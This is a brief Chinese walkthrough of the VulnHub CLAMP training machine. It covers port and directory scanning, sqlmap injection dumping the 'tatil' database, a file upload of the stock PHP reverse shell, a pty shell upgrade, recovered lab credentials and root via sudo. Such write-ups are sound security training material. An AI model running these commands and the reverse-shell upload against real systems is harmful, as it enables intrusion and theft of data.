https://download.vulnhub.com/clamp/CLAMP-Machine-v1.0.1.zip

nmap -sS -sV -A -p- 192.168.31.156

dirsearch -u http://192.168.31.156


查看源码

提示让收集更多信息

下面是一些判断题,对与错对应1与0

最后结果为0110111001,拼接访问


sqlmap -u "http://192.168.31.156/nt4stopc/0110111001/summertimesummertime/go.php?id=1" --random-agent --batch

测试数据库
sqlmap -u "http://192.168.31.156/nt4stopc/0110111001/summertimesummertime/go.php?id=1" --dbs --random-agent --batch

查看tatil 下表名
sqlmap -u "http://192.168.31.156/nt4stopc/0110111001/summertimesummertime/go.php?id=1" -D tatil --tables --random-agent --batch

获取gereksiz的数据
sqlmap -u "http://192.168.31.156/nt4stopc/0110111001/summertimesummertime/go.php?id=1" -D tatil -T gereksiz --dump --random-agent --batch

拿到一串加密值
uvuvwevwevwe-onyetenyevwe-ugwemuhwem-osas
拼接访问

再拼接 upload.php

得到一个文件上传点
发现没有提交按钮,自己在前端给加一个

locate php-reverse-shell.php 查询
cp /usr/share/webshells/php/php-reverse-shell.php . 复制
vi php-reverse-shell.php 编辑



上传该文件后,返回了文件路径,文件名为md5加密后的
osas/2ad6bded962b884337eaeb921d7c2764.php
访问文件,成功反弹shell

python3 -c 'import pty;pty.spawn("/bin/bash")'

查看文件,发现内容

url解码,得到账户密码
mkelepce:mklpc-osas112.


直接sudo su提权

提权成功!!!